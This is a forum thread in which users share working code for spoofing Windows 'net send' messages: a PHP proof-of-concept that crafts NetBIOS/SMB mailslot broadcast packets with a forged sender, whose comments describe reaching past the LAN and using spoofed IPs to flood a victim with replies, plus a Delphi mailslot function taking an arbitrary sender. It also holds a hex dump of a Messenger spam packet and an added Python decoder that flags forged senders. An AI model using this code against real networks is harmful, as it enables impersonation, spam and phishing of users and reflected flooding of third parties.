net send spoofing

oetalog

User
Joined
July 22, 2005
Posts
8
How do you do net send spoofing?? I have this script, but something doesn't work :/
What I want is for the "from" field to show a different name instead of my user name

Can someone tell me what is going on in this script, because something doesn't work :/


//This proof-of-concept, equivalent to the command [1], sends a broadcast packet
//to every computer on a LAN on UDP port 138, as one would legitimately
//expect. By changing the $data variable, and consequently the $datagramlength
//variable, it is possible to spoof the sender of the message.
//By changing the IP it is possible to cross the boundaries of a LAN.

<?php

// rgod NET SEND
// proof-of-concept net send spoofing

// encoding function for NetBIOS names: first-level encoding (RFC 1001 14.1),
// each nibble of a byte becomes the character 'A' + nibble; only the uppercase
// letters, digits and symbols listed below are mapped, anything else is dropped
function myencoder($stringa)
{
$stringa=substr($stringa,0,15); // a NetBIOS name is at most 15 bytes
$enc='';
for ($crttr=0; $crttr<=(strlen($stringa)-1); $crttr++)
{
switch ($stringa[$crttr])
{
case 'A': $enc.='EB'; break;
case 'B': $enc.='EC'; break;
case 'C': $enc.='ED'; break;
case 'D': $enc.='EE'; break;
case 'E': $enc.='EF'; break;
case 'F': $enc.='EG'; break;
case 'G': $enc.='EH'; break;
case 'H': $enc.='EI'; break;
case 'I': $enc.='EJ'; break;
case 'J': $enc.='EK'; break;
case 'K': $enc.='EL'; break;
case 'L': $enc.='EM'; break;
case 'M': $enc.='EN'; break;
case 'N': $enc.='EO'; break;
case 'O': $enc.='EP'; break;
case 'P': $enc.='FA'; break;
case 'Q': $enc.='FB'; break;
case 'R': $enc.='FC'; break;
case 'S': $enc.='FD'; break;
case 'T': $enc.='FE'; break;
case 'U': $enc.='FF'; break;
case 'V': $enc.='FG'; break;
case 'W': $enc.='FH'; break;
case 'X': $enc.='FI'; break;
case 'Y': $enc.='FJ'; break;
case 'Z': $enc.='FK'; break;
case '0': $enc.='DA'; break;
case '1': $enc.='DB'; break;
case '2': $enc.='DC'; break;
case '3': $enc.='DD'; break;
case '4': $enc.='DE'; break;
case '5': $enc.='DF'; break;
case '6': $enc.='DG'; break;
case '7': $enc.='DH'; break;
case '8': $enc.='DI'; break;
case '9': $enc.='DJ'; break;
case ' ': $enc.='CA'; break;
case '!': $enc.='CB'; break;
case '"': $enc.='CC'; break;
case '#': $enc.='CD'; break;
case '$': $enc.='CE'; break;
case '%': $enc.='CF'; break;
case '&': $enc.='CG'; break;
case "'": $enc.='CH'; break;
case '(': $enc.='CI'; break;
case ')': $enc.='CJ'; break;
case '*': $enc.='CK'; break;
case '+': $enc.='CL'; break;
case ',': $enc.='CM'; break;
case '-': $enc.='CN'; break;
case '.': $enc.='CO'; break;
case '=': $enc.='DN'; break;
case ':': $enc.='DK'; break;
case ';': $enc.='DL'; break;
case '@': $enc.='EA'; break;
case '^': $enc.='FO'; break;
case '_': $enc.='FP'; break;
case '{': $enc.='HL'; break;
case '}': $enc.='HN'; break;
case '~': $enc.='HO'; break;
}
}
// pad with encoded spaces ('CA') up to 15 name bytes = 30 characters; the original
// do/while on "<>30" never terminated once the string had passed 30 characters
while (strlen($enc)<30) {$enc.='CA';}
$enc.='AA'; // 16th byte: NetBIOS suffix 0x00 (workstation)
return $enc;
}

// build the packet

//[1] Netbios datagram service
$messagetype=chr(0x11);
$morefragments=chr(0x02); //no
$datagramid=chr(0x81).chr(0x33);
$sourceip=chr(0x52).chr(0x31).chr(0x36).chr(0x63); //82.49.54.99
$sourceport=chr(0x00).chr(0x8a); //138
$datagramlength=chr(0x00).chr(0xa8);
$packetoffset=chr(0x00).chr(0x00);
// each name: 0x20 = one 32-byte encoded label, followed by a 0x00 terminator
$sourcename=chr(0x20).myencoder('CILA').chr(0x00);
$destinationname=chr(0x20).myencoder('WORKGROUP').chr(0x00);

$firstblock=$messagetype.$morefragments.$datagramid.$sourceip.$sourceport.
$datagramlength.$packetoffset.$sourcename.$destinationname;

//[2] SMB Server Message Block Protocol
$servercomponent=chr(0xff).chr(0x53).chr(0x4d).chr(0x42); //SMB
$smbcommand=chr(0x25); //Trans
$errorclass=chr(0x00); //success
$reserved=chr(0x00);
$errorcode=chr(0x00).chr(0x00); //no error
$flags=chr(0x18);
$flagsii=chr(0x04).chr(0x00);
$processid=chr(0x00).chr(0x00);
$signature=chr(0x00).chr(0x00).chr(0x00).chr(0x00).
chr(0x00).chr(0x00).chr(0x00).chr(0x00);
$reservedii=chr(0x00).chr(0x00);
$treeid=chr(0x00).chr(0x00);
$processidii=chr(0xff).chr(0xfe);
$useridii=chr(0x00).chr(0x00);
$multiplexid=chr(0x00).chr(0x00);
$wordcount=chr(0x11);
$totalparametercount=chr(0x00).chr(0x00);
$totaldatacount=chr(0x0c).chr(0x00);
$maxparametercount=chr(0x02).chr(0x00);
$maxdatacount=chr(0x00).chr(0x00);
$maxsetupcount=chr(0x00);
$reservediii=chr(0x00);
$flagsiii=chr(0x02).chr(0x00);
$timeout=chr(0x00).chr(0x00).chr(0x00).chr(0x00);
$reservediv=chr(0x00).chr(0x00);
$parametercount=chr(0x00).chr(0x00);
$parameteroffset=chr(0x58).chr(0x00);
$datacount=chr(0x0c).chr(0x00);
$dataoffset=chr(0x58).chr(0x00);
$setupcount=chr(0x03);
$reservedv=chr(0x00);
$opcode=chr(0x01).chr(0x00);
$priority=chr(0x00).chr(0x00);
$class=chr(0x02).chr(0x0);
$bytecount=chr(0x1f).chr(0x00);
$transactionname='\MAILSLOT\messngr'.chr(0x00); // the forum display dropped the backslashes; $bytecount (0x1f) and $dataoffset (0x58) assume this 17-character name
$padding=chr(0x05);

$data='HCKR'.chr(0x00).'*'.chr(0x00).'ciao'.chr(0x00);

$secondblock=$servercomponent.$smbcommand.$errorclass.$reserved.
$errorcode.$flags.$flagsii.$processid.$signature.$reservedii.
$treeid.$processidii.$useridii.$multiplexid.$wordcount.$totalparametercount.
$totaldatacount.$maxparametercount.$maxdatacount.$maxsetupcount.
$reservediii.$flagsiii.$timeout.$reservediv.$parametercount.
$parameteroffset.$datacount.$dataoffset.$setupcount.$reservedv.
$opcode.$priority.$class.
$bytecount.$transactionname.$padding.$data;

// reassemble the packet
$mypacket=$firstblock.$secondblock;

$ip='255.255.255.255';
$fp=fsockopen('udp://'.$ip, 138, $errno, $errstr);
if (!$fp) { die("fsockopen failed: $errstr ($errno)\n"); } // report the socket error instead of writing to a false handle
fputs($fp, $mypacket);
fclose($fp);

?>

// Spammers' attention has shifted to all the UDP ports, and to
// port 135 in particular
// I sniffed one of these packets with Ethereal...

// 04 00 08 00 10 00 00 00 00 00 00 00 00 00 ........ ........
//0040 00 00 00 00 00 00 00 00 00 00 f8 91 7b 5a 00 ff ........ ....{Z..
//0050 d0 11 a9 b2 00 c0 4f b6 e6 fc 33 d7 5a d8 08 7e ......O. ..3.Z..~
//0060 a9 40 bc 96 4e d0 b1 59 f3 d7 f1 07 a9 41 01 00 .@..N..Y .....A..
//0070 00 00 0e 00 00 00 00 00 ff ff 78 00 32 03 00 00 ........ ..x.2...
//0080 00 00 0a 00 00 00 00 00 00 00 0a 00 00 00 4d 49 ........ ......MI
//0090 43 52 4f 53 4f 46 54 00 00 00 0c 00 00 00 00 00 CROSOFT. ........
//00a0 00 00 0c 00 00 00 38 32 2e 34 39 2e 35 34 2e 37 ......82 .49.54.7
//00b0 38 00 f6 02 00 00 00 00 00 00 f6 02 00 00 4d 69 8....... ......Mi
//00c0 63 72 6f 73 6f 66 74 20 53 65 63 75 72 69 74 79 crosoft Security
//00d0 20 55 70 64 61 74 65 20 4d 53 30 33 2d 30 34 33 Update MS03-043
//00e0 3a 20 41 75 67 75 73 74 20 32 37 2c 20 32 30 30 : August 27, 200
//00f0 34 0d 0a 0d 0a 46 72 6f 6d 20 4d 69 63 72 6f 73 4....Fro m Micros
//0100 6f 66 74 27 73 20 54 65 63 68 4e 65 74 20 77 65 oft's Te chNet we
//0110 62 73 69 74 65 3a 20 22 41 20 73 65 63 75 72 69 bsite: " A securi
//0120 74 79 20 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 ty vulne rability
//0130 20 65 78 69 73 74 73 20 69 6e 20 74 68 65 20 4d exists in the M
//0140 65 73 73 65 6e 67 65 72 20 53 65 72 76 69 63 65 essenger Service
//0150 20 74 68 61 74 20 63 6f 75 6c 64 20 0d 0a 61 6c that co uld ..al
//0160 6c 6f 77 20 61 72 62 69 74 72 61 72 79 20 63 6f low arbi trary co
//0170 64 65 20 65 78 65 63 75 74 69 6f 6e 20 6f 6e 20 de execu tion on
//0180 61 6e 20 61 66 66 65 63 74 65 64 20 73 79 73 74 an affec ted syst
//0190 65 6d 2e 20 41 6e 20 61 74 74 61 63 6b 65 72 20 em. An a ttacker
//01a0 77 68 6f 20 73 75 63 63 65 73 73 66 75 6c 6c 79 who succ essfully
//01b0 20 65 78 70 6c 6f 69 74 65 64 20 74 68 69 73 20 exploit ed this
//01c0 0d 0a 76 75 6c 6e 65 72 61 62 69 6c 69 74 79 20 ..vulner ability
//01d0 63 6f 75 6c 64 20 62 65 20 61 62 6c 65 20 74 6f could be able to
//01e0 20 72 75 6e 20 63 6f 64 65 20 77 69 74 68 20 4c run cod e with L
//01f0 6f 63 61 6c 20 53 79 73 74 65 6d 20 70 72 69 76 ocal Sys tem priv
//0200 69 6c 65 67 65 73 20 6f 6e 20 61 6e 20 61 66 66 ileges o n an aff
//0210 65 63 74 65 64 20 73 79 73 74 65 6d 2e 20 54 68 ected sy stem. Th
//0220 65 20 61 74 74 61 63 6b 65 72 20 0d 0a 63 6f 75 e attack er ..cou
//0230 6c 64 20 74 68 65 6e 20 74 61 6b 65 20 61 6e 79 ld then take any
//0240 20 61 63 74 69 6f 6e 20 6f 6e 20 74 68 65 20 73 action on the s
//0250 79 73 74 65 6d 2c 20 69 6e 63 6c 75 64 69 6e 67 ystem, i ncluding
//0260 20 69 6e 73 74 61 6c 6c 69 6e 67 20 70 72 6f 67 install ing prog
//0270 72 61 6d 73 2c 20 76 69 65 77 69 6e 67 2c 20 63 rams, vi ewing, c
//0280 68 61 6e 67 69 6e 67 20 6f 72 20 64 65 6c 65 74 hanging or delet
//0290 69 6e 67 20 0d 0a 64 61 74 61 2c 20 6f 72 20 63 ing ..da ta, or c
//02a0 72 65 61 74 69 6e 67 20 6e 65 77 20 61 63 63 6f reating new acco
//02b0 75 6e 74 73 20 77 69 74 68 20 66 75 6c 6c 20 70 unts wit h full p
//02c0 72 69 76 69 6c 65 67 65 73 2e 22 0d 0a 0d 0a 54 rivilege s."....T
//02d0 6f 20 73 65 63 75 72 65 20 61 6c 6c 20 76 75 6c o secure all vul
//02e0 6e 65 72 61 62 69 6c 69 74 69 65 73 20 77 69 74 nerabili ties wit
//02f0 68 20 74 68 65 20 4d 65 73 73 65 6e 67 65 72 20 h the Me ssenger
//0300 53 65 72 76 69 63 65 20 70 6c 65 61 73 65 20 76 Service please v
//0310 69 73 69 74 20 77 77 77 2e 53 74 6f 70 4d 65 73 isit www .StopMes
//0320 73 65 6e 67 65 72 41 64 73 2e 63 6f 6d 0d 0a 0d sengerAd s.com...
//0330 0a 43 6c 69 63 6b 69 6e 67 20 4f 4b 20 77 69 6c .Clickin g OK wil
//0340 6c 20 6e 6f 74 20 74 61 6b 65 20 79 6f 75 20 74 l not ta ke you t
//0350 6f 20 74 68 65 20 77 65 62 73 69 74 65 2e 20 50 o the we bsite. P
//0360 6c 65 61 73 65 20 76 69 73 69 74 20 74 68 65 20 lease vi sit the
//0370 77 65 62 73 69 74 65 20 62 65 66 6f 72 65 20 63 website before c
//0380 6c 69 63 6b 69 6e 67 20 4f 4b 2e 0d 0a 0d 0a 2a licking OK.....*
//0390 2a 2a 2a 20 77 77 77 2e 53 74 6f 70 4d 65 73 73 *** www. StopMess
//03a0 65 6e 67 65 72 41 64 73 2e 63 6f 6d 20 2a 2a 2a engerAds .com ***
//03b0 2a 0d 0a 00 *...

//... which manages to raise a wry smile.
//This kind of spam fragmented over UDP ports opens up the possibility of
//another kind of attack. By spoofing the IP, the owner of the real IP will
//find their network congested by replies or ICMP ECHO unreachable packets

//rgod
 

goliat

User
Joined
January 16, 2005
Posts
23
check this out:

Code:
function myNetSend(sender,receiver,message : string):boolean;
{ needs the Windows unit: CopyMemory, CreateFile, WriteFile, CloseHandle }
var data     : array [1..1024] of char;
    strSlot  : string;
    hSlot    : THandle;
    bWritten : DWORD;
    dwLength : DWORD;
begin
  result:=FALSE;
  { the three NUL-terminated strings must fit in the fixed buffer }
  if length(sender)+length(receiver)+length(message)+3 > sizeof(data) then exit;
  { payload layout is sender#0 receiver#0 message#0 }
  CopyMemory(@data[1],Pchar(sender),length(sender));
  dwLength:=length(sender);
  Inc(dwLength);
  data[dwLength]:=#0;
  CopyMemory(@data[dwLength+1],Pchar(receiver),length(receiver));
  Inc(dwLength,length(receiver)+1);
  data[dwLength]:=#0;
  CopyMemory(@data[dwLength+1],Pchar(message),length(message));
  Inc(dwLength,length(message)+1);
  data[dwLength]:=#0;
  { the forum display dropped the backslashes: the messenger mailslot path is \\host\MAILSLOT\messngr }
  strSlot:='\\'+receiver+'\MAILSLOT\messngr';
  hSlot:=CreateFile(Pchar(strSlot),GENERIC_WRITE, {FILE_SHARE_READ}0, nil,
    OPEN_EXISTING, 0, 0);
  { CreateFile returns INVALID_HANDLE_VALUE, not 0, on failure }
  if hSlot<>INVALID_HANDLE_VALUE then begin
     result:=WriteFile(hSlot,data,dwLength,bWritten,nil)=TRUE;
     CloseHandle(hSlot);
     end;
end;

Messenger uses the mailslot mechanism. There are also other programmatic ways of handling net send, implemented at a higher layer.
Code from the days when I still wrote things in Delphi.

Supposedly there is a "helped" button somewhere on this page? I can't find it :mrgreen:
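Added example, not code from either post above: a Python decoder for the datagram both posts describe, that is the RFC 1002 NetBIOS datagram header with its first-level-encoded names, the SMB Trans write to \MAILSLOT\messngr, and the sender\0recipient\0text\0 mailslot payload that the Delphi function assembles. On the defensive side it flags a datagram whose NetBIOS source name disagrees with the mailslot sender field, which is exactly what the PHP proof-of-concept produces (NBT source CILA, mailslot sender HCKR). The sample packet is constructed in-script by build_sample_datagram, which mirrors the field values of the PHP above and sends nothing; all function names are my own.

```python
import struct

# Messenger-service mailslot name; the forum display stripped these backslashes.
MAILSLOT = b"\\MAILSLOT\\messngr"


def first_level_encode(name: str, suffix: int = 0x00) -> bytes:
    """NetBIOS first-level encoding (RFC 1001 14.1): pad the name with spaces to
    15 bytes, append the suffix byte, then emit each nibble as 'A' + nibble."""
    raw = name.upper().encode("ascii").ljust(15, b" ") + bytes([suffix])
    return bytes(c for b in raw for c in (0x41 + (b >> 4), 0x41 + (b & 0x0F)))


def first_level_decode(encoded: bytes) -> tuple[str, int]:
    """Inverse of first_level_encode: returns (name without padding, suffix byte)."""
    if len(encoded) != 32:
        raise ValueError("encoded NetBIOS name must be 32 bytes")
    raw = bytearray()
    for i in range(0, 32, 2):
        hi, lo = encoded[i] - 0x41, encoded[i + 1] - 0x41
        if not (0 <= hi < 16 and 0 <= lo < 16):
            raise ValueError("byte is not first-level encoded")
        raw.append((hi << 4) | lo)
    return raw[:15].decode("ascii").rstrip(" "), raw[15]


def _read_nbt_name(buf: bytes, off: int) -> tuple[str, int, int]:
    """Read one length-prefixed (0x20), NUL-terminated encoded name at buf[off:]."""
    if buf[off] != 32 or buf[off + 33] != 0:
        raise ValueError("unsupported NetBIOS name label")
    name, suffix = first_level_decode(buf[off + 1:off + 33])
    return name, suffix, off + 34


def parse_messenger_datagram(pkt: bytes) -> dict:
    """Decode an NBT datagram (RFC 1002 4.4.1) that carries an SMB Trans mailslot
    write to \\MAILSLOT\\messngr and flag a sender mismatch between the two layers."""
    msg_type, _flags, _dgm_id, src_ip, _src_port, dgm_len, _off = struct.unpack_from(
        "!BBH4sHHH", pkt, 0)
    if msg_type not in (0x10, 0x11, 0x12):
        raise ValueError("not a direct/broadcast NetBIOS datagram")
    if dgm_len != len(pkt) - 14:            # DGM_LENGTH covers both names plus user data
        raise ValueError("datagram length field disagrees with packet size")
    src_name, _src_suffix, off = _read_nbt_name(pkt, 14)
    dst_name, _dst_suffix, off = _read_nbt_name(pkt, off)
    smb = pkt[off:]
    # SMB header is 32 bytes; a Trans request (0x25) for a mailslot has 17 parameter words
    if smb[:4] != b"\xffSMB" or smb[4] != 0x25 or smb[32] != 17:
        raise ValueError("not an SMB Trans request")
    data_count, data_offset = struct.unpack_from("<HH", smb, 55)   # DataCount, DataOffset
    opcode = struct.unpack_from("<H", smb, 61)[0]                   # setup word 0: 1 = write mailslot
    trans_name = smb[69:smb.index(b"\0", 69)]                       # follows the 2-byte ByteCount
    if opcode != 1 or trans_name.upper() != MAILSLOT.upper():
        raise ValueError("not a write to the messenger mailslot")
    fields = smb[data_offset:data_offset + data_count].split(b"\0")
    if len(fields) < 3:
        raise ValueError("mailslot payload is not sender\\0recipient\\0text\\0")
    sender, recipient, text = (f.decode("latin-1") for f in fields[:3])
    return {
        "src_ip": ".".join(str(b) for b in src_ip),
        "nbt_source": src_name, "nbt_destination": dst_name,
        "sender": sender, "recipient": recipient, "text": text,
        # the PoC leaves the NetBIOS source name honest and forges only this field
        "spoofed_sender": sender.upper() != src_name.upper(),
    }


def build_sample_datagram(src_name: str, dst_name: str, sender: str, recipient: str, text: str) -> bytes:
    """Constructed test fixture mirroring the PHP field values above; nothing is sent."""
    data = b"\0".join(s.encode("latin-1") for s in (sender, recipient, text)) + b"\0"
    trans = MAILSLOT + b"\0\x05"                      # transaction name, NUL, one pad byte
    data_offset = 32 + 1 + 34 + 2 + len(trans)        # header, WordCount, 17 words, ByteCount, name
    header = b"\xffSMB\x25" + b"\0" * 4 + b"\x18\x04\x00" + b"\0" * 14 + b"\xff\xfe" + b"\0" * 4
    words = struct.pack("<HHHHBBHIHHHHHBB", 0, len(data), 2, 0, 0, 0, 2, 0, 0,
                        0, data_offset, len(data), data_offset, 3, 0)
    setup = struct.pack("<HHH", 1, 0, 2)               # opcode write-mailslot, priority, class
    smb = header + b"\x11" + words + setup + struct.pack("<H", len(trans) + len(data)) + trans + data
    names = b"\x20" + first_level_encode(src_name) + b"\0" + b"\x20" + first_level_encode(dst_name) + b"\0"
    nbt = struct.pack("!BBH4sHHH", 0x11, 0x02, 0x8133, bytes([82, 49, 54, 99]), 138,
                      len(names) + len(smb), 0)
    return nbt + names + smb


if __name__ == "__main__":
    # the packet the PHP above builds: NBT source CILA, mailslot sender HCKR
    print(parse_messenger_datagram(build_sample_datagram("CILA", "WORKGROUP", "HCKR", "*", "ciao")))
```

The length check against DGM_LENGTH and the equality test between the NetBIOS source name and the mailslot sender are the two cheap consistency checks a monitor on UDP/138 can apply; a legitimate net send fills both fields from the same machine name, while the proof-of-concept only forges the inner one.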
 

goliat

User
Joined
January 16, 2005
Posts
23
That button is only visible to the thread starter
you know, Maver, I'm aware of that; I'll let you in on a big secret, that text was a little insinuation

seriously 8)
by the way, it's good that there are so many people on the forum willing to help, keep it up
 